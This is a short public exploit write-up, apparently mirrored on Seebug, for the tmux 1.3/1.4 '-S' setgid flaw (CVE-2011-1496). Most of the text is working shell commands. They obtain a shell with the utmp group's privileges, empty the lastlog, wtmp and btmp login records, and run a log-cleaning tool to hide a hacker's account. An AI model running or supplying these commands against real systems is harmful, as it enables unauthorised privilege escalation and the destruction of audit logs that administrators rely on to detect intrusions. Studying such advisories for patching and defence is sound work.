--------------------------------------- | Team ph0x90bic proudly presents | | tmux -S 1.3/1.4 local utmp exploit | --------------------------------------- # Exploit Title: tmux '-S' Option Incorrect SetGID Local Privilege Escalation Vulnerability # Date: 11.04.2011 # Author: ph0x90bic # Software Link: http://tmux.sourceforge.net/ # Version: 1.3/1.4 # Tested on: Linux debian 2.6.26-1-686 # CVE : CVE-2011-1496 --- INTRODUCTION tmux 1.3/1.4 contains a privilege escalation vulnerabillity, which gives you utmp group privileges. This bug is important, because it is possible to clean logfiles and use logcleaners for btmp, wtmp and lastlog without local root access. --- EXPLOIT Execute shell as utmp group $ tmux -S /tmp/.whateveryouwant -c id uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) $ tmux -S /tmp/.whateveryouwant -c /bin/sh $ id uid=1001(company) gid=1001(company) egid=43(utmp), groups=1001(company) -- Delete logfiles $ tmux -S /tmp/.whateveryouwant -c '> /var/log/lastlog' $ tmux -S /tmp/.whateveryouwant -c '> /var/log/wtmp' $ tmux -S /tmp/.whateveryouwant -c '> /var/log/btmp' -- Use logcleaner software $ tmux -S /tmp/.whateveryouwant -c /tmp/thcclear13/cleara hacker-username
※本站提供的任何内容、代码与服务仅供学习,请勿用于非法用途,否则后果自负
您的会员可兑换次数还剩: 次 本次兑换将消耗 1 次
续费请拨打客服热线,感谢您一直支持 Seebug!
暂无评论